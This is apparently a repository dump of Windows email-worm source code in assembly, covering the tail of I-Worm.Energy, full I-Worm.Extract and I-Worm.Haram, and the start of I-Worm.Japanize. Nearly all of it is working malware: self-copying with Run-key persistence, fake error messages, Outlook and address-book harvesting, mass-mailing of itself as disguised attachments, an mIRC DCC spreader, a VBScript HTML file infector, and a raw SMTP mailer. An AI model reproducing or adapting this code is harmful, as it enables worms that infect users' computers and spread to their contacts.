pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push offset SVCHandler
push offset e_name+5
call RegisterServiceCtrlHandlerA ;register service control
test eax,eax ;handler
je e_svc ;quit if error
push eax
call _ss
ss_: dd 10h or 20h
dd 4
dd 0
dd 0
dd 0
dd 0
dd 0
_ss: push eax
call SetServiceStatus ;set service status
call CloseServiceHandle ;close service handle
jmp e_svc ;and quit
SVCRegister EndP
;create item at SCM
SVCCreate Proc
push 000F0000h or 2
push 0
push 0
call OpenSCManagerA ;get handle to SCM
test eax,eax
je e_scm0
xchg eax,esi
; push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
; push offset e_name+5
; push esi
; call OpenServiceA ;*** debug!
;
; push eax
; push eax
; call DeleteService ;*** debug!
; call CloseServiceHandle ;*** debug!
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push offset sys_dir
push eax
push 2
push 10h
push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
push offset e_name+5
push dword ptr [esp]
push esi
call CreateServiceA ;create service item
test eax,eax ;at SCM
je e_scm1 ;quit if error
push eax
call CloseServiceHandle ;close service handlez
e_scm1: push esi
call CloseServiceHandle ;...
e_scm0: ret ;and quit
SVCCreate EndP
signature db 0,'[I-Worm.Energy] by Benny/29A',0
;signature
proc_dump db PROC_COUNT dup (?) ;buffer for PIDz
worm_name db 256 dup (?) ;buffer for filename
tmp dd ? ;temporary variable
sys_dir db 256 dup (?) ;buffer for system dir.
arc_buffer db 256 dup (?) ;buffer for archive
;filename
virtual_end: ;...end of virus.
ends
end Start ;.
;bonus:
;here are lyrics from "Imagine", one very nice song from John Lennon.
; Imagine there's no heaven,
; It's easy if you try,
; No hell below us,
; Above us only sky,
; Imagine all the people
; living for today...
;
; Imagine there's no countries,
; It isn't hard to do,
; Nothing to kill or die for,
; No religion too,
; Imagine all the people
; living life in peace...
;
; You may say I'm a dreamer,
; but I'm not the only one,
; I hope some day you'll join us,
; And the world will live as one.
;
; Imagine no possesions,
; I wonder if you can,
; No need for greed or hunger,
; A brotherhood of man,
; Imagine all the people
; Sharing all the world...
;
; You may say I'm a dreamer,
; but I'm not the only one,
; I hope some day you'll join us,
; And the world will live as one.

480
Win32/I-Worm.Extract.asm Normal file

@ -0,0 +1,480 @@
comment #
Name : I-Worm.Extract
Author : PetiK
Date : February 3rd 2002 - February 4th 2002
Size : 5632
Action :
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
include myinclude.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CopyFileA
kern CreateDirectoryA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetDateFormatA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetSystemTime
kern GetTimeFormatA
kern GetWindowsDirectoryA
kern lstrcat
kern lstrcmp
kern lstrcpy
kern lstrlen
kern MapViewOfFile
kern SetCurrentDirectoryA
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WriteProfileStringA
kern WritePrivateProfileStringA
push 50
mov esi,offset orig_worm
push esi
push 0
call _ptkGetModuleFileNameA
push 50
push offset verif_worm
call _ptkGetSystemDirectoryA
@pushsz "\UPDATEW32.EXE"
push offset verif_worm
call _ptklstrcat
push esi
push offset verif_worm
call _ptklstrcmp
test eax,eax
jz continue_worm
mov edi,offset copy_worm
push edi
push 50
push edi
call _ptkGetSystemDirectoryA
add edi,eax
mov eax,"dpU\"
stosd
mov eax,"Weta"
stosd
mov eax,"e.23"
stosd
mov eax,"ex"
stosd
pop edi
copy_w: push 0
push edi
push esi
call _ptkCopyFileA
run_w: push edi
@pushsz "RUN"
@pushsz "WINDOWS"
call _ptkWriteProfileStringA
call CreateDate
push 50
push offset realname
push offset orig_worm
api GetFileTitleA
@pushsz " - "
push offset date
call _ptklstrcat
push offset realname
push offset date
call _ptklstrcat
f_mess: push 10h
push offset date
call @mess
db "Cannot Open this File !",CRLF,CRLF
db "If you downloaded this file, try downloading again.",0
@mess:
push 0
api MessageBoxA
jmp end_worm
continue_worm:
push 50
push offset vbsfile
call _ptkGetWindowsDirectoryA
@pushsz "\ExtractVbs.vbs"
push offset vbsfile
call _ptklstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbsfile
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
push offset vbsfile
push offset vbsexec
call _ptklstrcpy
push 4
push offset execcontrol
call _ptkWinExec
push 5000
call _ptkSleep
push offset vbsfile
call _ptkDeleteFileA
payload:
push offset Systime
call _ptkGetSystemTime
cmp [Systime.wDay],29
jne end_pay
push 40h
@pushsz "I-Worm.Extract"
call e_mess
db "Hi man, you received my worm !",CRLF
db "Don't panic, it doesn't format your computer",CRLF,CRLF
db 9,"Bye and Have a Nice Day.",0
e_mess:
push 0
api MessageBoxA
end_pay:
sh_gsf: push 0
push 5
push offset progra
push 0
api SHGetSpecialFolderPathA
push offset progra
call _ptkSetCurrentDirectoryA
@pushsz "Update Windows 32bits"
call _ptkCreateDirectoryA
@pushsz "\Update Windows 32bits"
push offset progra
call _ptklstrcat
push offset progra
call _ptkSetCurrentDirectoryA
push 0
@pushsz "MAJ.exe"
push offset orig_worm
call _ptkCopyFileA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset winpath
call _ptkGetWindowsDirectoryA
push offset winpath
call _ptkSetCurrentDirectoryA
spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "Outlook_Addr.txt"
call _ptkCreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_s3: push esi
call _ptkUnmapViewOfFile
end_s2: push ebp
call _ptkCloseHandle
end_s1: push ebx
call _ptkCloseHandle
end_spread: popad
end_worm:
push 0
api ExitProcess
send_mail:
call CreateDate
call CreateTime
@pushsz "C:\liste.ini"
push offset mail_addr
push offset time
push offset date
call _ptkWritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "dddd, dd MMMM yyyy"
push 0
push 0
push 9
call _ptkGetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
call _ptkGetTimeFormatA
popad
ret
CreateTime EndP
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
verif_worm db 50 dup (0)
vbsfile db 50 dup (0)
winpath db 50 dup (0)
progra db 50 dup (0)
mail_addr db 128 dup (?)
realname db 50 dup (0)
date db 30 dup (?)
time db 9 dup (?)
octets dd ?
inet dd 0
sess dd 0
subject db "Re: Check This...",0
body db "Hi",CRLF
db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF
db 9,"Best Regards",CRLF,CRLF,CRLF
db "Salut,",CRLF
db "Voici le fichier que tu cherches. Ouvre vite ! C'est trčs important",CRLF,CRLF
db 9,"Mes sincčres salutations",0
filename db "important.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateDirectoryA db "CreateDirectoryA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetDateFormatA db "GetDateFormatA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetSystemTime db "GetSystemTime",0
szGetTimeFormatA db "GetTimeFormatA",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szlstrcmp db "lstrcmp",0
szlstrcpy db "lstrcpy",0
szlstrlen db "lstrlen",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateDirectoryA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetDateFormatA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetSystemTime dd ?
_ptkGetTimeFormatA dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptklstrcmp dd ?
_ptklstrcpy dd ?
_ptklstrlen dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWriteProfileStringA dd ?
_ptkWritePrivateProfileStringA dd ?
s_vbs: db 'On Error Resume Next',CRLF
db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set win=f.GetSpecialFolder(0)',CRLF
db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF
db 'c.Close',CRLF
db 'Set out=CreateObject("Outlook.Application")',CRLF
db 'Set mapi=out.GetNameSpace("MAPI")',CRLF
db 'adr="extractcounter@multimania.com"',CRLF
db 'For Each mail in mapi.AddressLists',CRLF
db 'If mail.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mail.AddressEntries.Count',CRLF
db 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
execcontrol db "wscript "
vbsexec db 50 dup (0)
db "",0
end start_worm
end

592
Win32/I-Worm.Haram.asm Normal file

@ -0,0 +1,592 @@
comment *
Name : I-Worm.Haram
Author : PetiK
Language : win32asm
Date : May 13th 2002 - June 1st 2002
Size : 5192 bytes (compressed with Petite Tool)
Comments : - Copy to %sysdir%\FunnyGame.exe
- Search all doc files in "Personal" folder and create a new virus html file:
example : document.doc -> document.htm
1) 2)
1) Good DOC file
2) Good HTM virus (1571 bytes)
- Put the name of all active process and add .htm:
example : process.exe -> process.exe.htm
3) 4)
3) Real name of active process
4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP)
- Create a random name file in StarUp folder to spread with Outlook
- On the 10th, payload : open and close CD door and display a messagebox in loop
*
.586p
.model flat
.code
JUMPS
include win32api.inc
LF equ 10
CR equ 13
CRLF equ <13,10>
@pushsz macro msg2psh, empty
local next_instr
ifnb <empty>
%out too much arguments in macro '@pushsz'
.err
endif
call next_instr
db msg2psh,0
next_instr:
endm
@endsz macro
local nxtchr
nxtchr: lodsb
test al,al
jnz nxtchr
endm
api macro a
extrn a:proc
call a
endm
WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
start: pushad
@SEH_SetupFrame <jmp end_worm>
hide_the_worm:
call hide_worm
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,'nuF\'
stosd
mov eax,'aGyn'
stosd
mov eax,'e.em'
stosd
mov eax,'ex'
stosd
pop edi
copy_worm:
push 1
push edi
push esi
api CopyFileA
test eax,eax
je ok_copy
push 50
push edi
push 1
@pushsz "Haram"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
push 50
push offset msgwrm
push esi
api GetFileTitleA
push 10h
push offset msgwrm
@pushsz "ERROR : this file is not a valid Win32 file."
push 0
api MessageBoxA
ok_copy:
call inf_doc_personal
get_startup_path:
push 0
push 7
push offset startup
push 0
api SHGetSpecialFolderPathA
push offset startup
api SetCurrentDirectoryA
call cr_vbsname
mov edi,offset vbsname
push 0
push 1
push 2
push 0
push 1
push 40000000h
push edi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle
payload:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+6],10
jne end_payload
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door open"
api mciSendStringA
push 500
api Sleep
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door closed"
api mciSendStringA
push 40h
@pushsz "I-Worm.Haram"
@pushsz "Coded by PetiK - ©2002 - France"
push 0
api MessageBoxA
api GetTickCount
push 10000
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
push ecx
api Sleep
jmp payload
end_payload:
call inf_process
end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess
hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset cpywrm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
inf_doc_personal Proc
pushad
get_personal_folder:
push 0
push 5
push offset personal
push 0
api SHGetSpecialFolderPathA
push offset personal
api SetCurrentDirectoryA
fff_doc:
push offset ffile
@pushsz "*.doc"
api FindFirstFileA
inc eax
je end_f_doc
dec eax
mov [hfind],eax
cr_file:
push offset ffile.cFileName
push offset new_file
api lstrcpy
mov esi,offset new_file
push esi
api lstrlen
add esi,eax
sub esi,4 ; to become \SYSTEM\Wsock32
mov [esi],"mth."
lodsd
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_file
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
fnf_doc:
push offset ffile
push [hfind]
api FindNextFileA
test eax,eax
jne cr_file
push [hfind]
api FindClose
end_f_doc:
popad
ret
inf_doc_personal EndP
inf_process Proc
popad
create_folder:
push 0
@pushsz "C:\backup"
api CreateDirectoryA
@pushsz "C:\backup"
api SetCurrentDirectoryA
enum_process:
push 0
push 2
api CreateToolhelp32Snapshot
mov lSnapshot,eax
inc eax
je end_inf_process
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
check_process:
test eax,eax
jz end_process
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextProcess
lea ebx,[uProcess.szExeFile]
push ebx
push offset new_name
api lstrcpy
mov edi,offset new_name
push edi
api lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push offset new_name
@pushsz "System.htm"
api lstrcmp
test eax,eax
jz NextProcess
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_name
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
NextProcess:
push offset uProcess
push lSnapshot
api Process32Next
jmp check_process
end_process:
push lSnapshot
api CloseHandle
end_inf_process:
pushad
ret
inf_process EndP
cr_vbsname Proc
mov edi,offset vbsname
; api GetTickCount
push 10
pop ecx
; xor edx,edx
; div ecx
; inc edx
; mov ecx,edx
name_g:
push ecx
api GetTickCount
push '9'-'0'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'0'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop name_g
mov eax,"sbv."
stosd
ret
cr_vbsname EndP
.data
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)
uProcess PROCESSENTRY32 <?>
ProcessID dd ?
lSnapshot dd ?
new_name db 100 dup (?)
orgwrm db 50 dup (0)
cpywrm db 50 dup (0)
msgwrm db 50 dup (0)
startup db 70 dup (0)
personal db 70 dup (0)
new_file db 90 dup (0)
vbsname db 20 dup (0)
byte_write dd ?
hfind dd ?
s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
db "n2= /.dcc send $nick "
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:
s_htm: db '<haram>',CRLF
db '<html><head><title>Windows Media Player</title></head><body>',CRLF
db '<script language=VBScript>',CRLF
db 'On Error Resume Next',CRLF
db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
db 'If err.number=429 Then',CRLF
db 'kupfkvqg.Run javascript:location.reload()',CRLF
db 'Else',CRLF,CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
db 'End If',CRLF,CRLF
db 'Function glvqglvb(dir)',CRLF
db 'If upfkupfk.FolderExists(dir) Then',CRLF
db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
db ' Set bbblvqgl=bbbbbbbb.Files',CRLF
db ' For each lvqgvqgl in bbblvqgl',CRLF
db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' htmorg=rhmwrrhm.ReadAll()',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set mwrrhmwr=document.body.createTextRange',CRLF
db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
db ' rhmwrrhm.WriteLine "<haram>"',CRLF
db ' rhmwrrhm.Write(htmorg)',CRLF
db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Else',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' End If',CRLF
db ' End If',CRLF
db ' Next',CRLF
db 'End If',CRLF
db 'End Function',CRLF
db '</script></body></html>',0
e_htm:
s_vbs: db 'On Error Resume Next',CRLF
db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF
db 'Set sys = terqne.GetSpecialFolder(1)',CRLF
db 'copyname = sys&"\FunnyGame.exe"',CRLF
db 'Set htgx = CreateObject("Outlook.Application")',CRLF
db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF
db 'For each c In ofcc.AddressLists',CRLF
db 'If c.AddressEntries.Count <> 0 Then',CRLF
db 'For d = 1 To c.AddressEntries.Count',CRLF
db 'Set etldb = htgx.CreateItem(0)',CRLF
db 'etldb.To = c.AddressEntries(d).Address',CRLF
db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF
db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF
db 'etldb.Attachments.Add(copyname)',CRLF
db 'etldb.DeleteAfterSubmit = True',CRLF
db 'If etldb.To <> "" Then',CRLF
db 'etldb.Send',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',0
e_vbs:
ends
end start
*************************************************************************
@tasm32 /M /ML haram.asm
@tlink32 -Tpe -aa -c -x haram.obj,,,import32,haram.def
rem pause
rem upx -9 haram.exe
@del *.obj
rem pause
*************************************************************************
IMPORTS
SHLWAPI.SHSetValueA
SHELL32.SHGetSpecialFolderPathA

857
Win32/I-Worm.Japanize.asm Normal file

@ -0,0 +1,857 @@
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
;;; I-Worm.Japanize
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
;;;
;;;
;;; This has some bugs.
;;;
;;; Here TrendMicro description:
;;; ******************************************************************
;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T
;;; Details:
;;;The details of the email this worm arrives with may be as follows:
;;;
;;;To: <recipient>
;;;Subject: <"Important" or random Japanese text(applicable on Japanese supported platforms)>
;;;Message Body: <blank>
;;;Attachment: patch.exe
;;;
;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system:
;;;HKEY_CURRENT_USER\Software\Microsoft\
;;;Internet Account Manager\Accounts\00000001
;;;
;;;It uses the following registry key to retrieve email addresses from the infected user's Windows Address Book (WAB):
;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\
;;;WAB4Wab File Name = “<pathname of WAB file>”
;;;
;;;The email arrives with the attachment PATCH.EXE. If the email address of its target ;;;user ends with the extension .jp, the worm randomly selects a phrase, from a list of 17 possible Japanese phrases below, and uses one as the subject of the email:
;;;
;;;
;;;The English translation for the above Japanese text are as follows:
;;;Re: the issue that you mentioned
;;;Re: important
;;;Re: long time no see
;;;Re: top secret
;;;Re: Hello
;;;Re: important information
;;;Re: data
;;;the issue that you mentioned
;;;important
;;;long time no see
;;;top secret
;;;hello
;;;important information
;;;data
;;;frog
;;;shit
;;;shit
;;;
;;;Otherwise, it uses the subject “Important."
;;;
;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email.
;;;
;;;The following text strings are found in the worm body:
;;;
;;;XXXXXXXXXXXXXXXXXXXXXXX
;;;XXXXX I-Worm.Japanize XXXXX
;;;XXXXXXXXXXXXXXXXXXXXXXX
;;;
;;;
.586p
.model flat
locals
jumps
;;; some lazy shit
callW macro @@@x
extrn @@@x:proc
call @@@x
endm
ofs equ offset
dwo equ dword ptr
wo equ word ptr
by equ byte ptr
HKEY_CURRENT_USER EQU 80000001h
CRLF equ <13,10>
rdtsc equ <dw 310fh>
AF_INET equ 2
SOCK_STREAM equ 1
FILE_ATTRIBUTE_NORMAL EQU 00000080h
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
PAGE_READONLY EQU 00000002h
PAGE_READWRITE EQU 00000004h
FILE_MAP_READ EQU 00000004h
OPEN_EXISTING EQU 00000003h
GHND EQU 042h
FILE_SHARE_READ EQU 00000001h
FILE_SHARE_WRITE EQU 00000002h
;;; ----------------------------------------------------------------
.data
hReg dd ?; registry handle
str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0
str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\'
AccountIdx db 9 dup(?); account index
bufsiz_accountidx dd 9; size
str_DMA db 'Default Mail Account',0
str_SMTPNAME db 'SMTP Server',0
str_SMTPEmailAddr db 'SMTP Email Address',0
str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0
SMTP_Server db 50 dup(?) ; default smtp server
bufsiz_SMTPSERVER dd 50
morons_Mailaddr db 256 dup(?) ; mail address of moron :)
bufsiz_morons_mailaddr dd 256
wab4_path db 260 dup(?); wab file path
bufsiz_wab4_path dd 260
buffer db 1000 dup(?)
hwab4file dd ? ; wab4 file handle
hwab4map dd ? ;
hwab4mapview dd ? ;
myfilename db 260 dup(?) ; handle of myself
hmyfile dd ?
fsize dd ? ; file size
hmemout0 dd ?
ptr_myself dd ?
hmemout dd ? ; globalalloc
ptr_base64buf dd ? ; globallock
target_mailaddr db 48h dup(?) ;
sockaddr_in label byte ;
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup(?)
len_sockaddr_in = $ - ofs sockaddr_in
sock dd ? ; socket descriptor
recv_buffer db 1024 dup(?) ; recv buffer
jflag dd 0 ; japanese or not
smtp_HELO db 'HELO localhost',CRLF
len_smtp_HELO = $ - ofs smtp_HELO
smtp_MAIL_FROM db 'MAIL FROM: '
len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM
;crlf
smtp_RCPT_TO db 'RCPT TO: '
len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO
;crlf
smtp_DATA db 'DATA',CRLF
len_smtp_DATA = $ - ofs smtp_DATA
smtp_BODY_FROM db 'FROM: '
len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM
smtp_BODY_TO db CRLF,'TO: '
len_smtp_BODY_TO = $ - ofs smtp_BODY_TO
smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF
len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT
smtp_DOT_CRLF db '.',CRLF
len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF
smtp_QUIT db 'QUIT',CRLF
len_smtp_QUIT = $ - ofs smtp_QUIT
smtp_crlf db CRLF
smtp_MIME_h db 'MIME-Version: 1.0',CRLF
db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF
db 'Content-Transfer-Encoding: 7bit',CRLF
db 'Content-Description: Mail message body',CRLF
db CRLF
db CRLF ; text
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF
db 'Content-Disposition: attachment; filename="patch.exe"',CRLF
db 'Content-Transfer-Encoding: BASE64',CRLF
db CRLF
len_smtp_MIME_h = $ - ofs smtp_MIME_h
;; base64 body
smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF
len_smtp_MIME_e = $ - ofs smtp_MIME_e
r_seed dd 10987293h ; random seed
smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?'
len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1
smtp_jsubject_2 db '?=',CRLF
len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2
;;; japanese subjects table
japanese_subjects label byte
dd ofs js_01
dd ofs js_02
dd ofs js_03
dd ofs js_04
dd ofs js_05
dd ofs js_06
dd ofs js_07
dd ofs js_08
dd ofs js_09
dd ofs js_10
dd ofs js_11
dd ofs js_12
dd ofs js_13
dd ofs js_14
dd ofs js_15
dd ofs js_16
dd ofs js_17
num_of_jsub = ($ - ofs japanese_subjects)/4
js_01 db 'GyRCPUVNVxsoQg==',0 ; 重要
js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re:重要
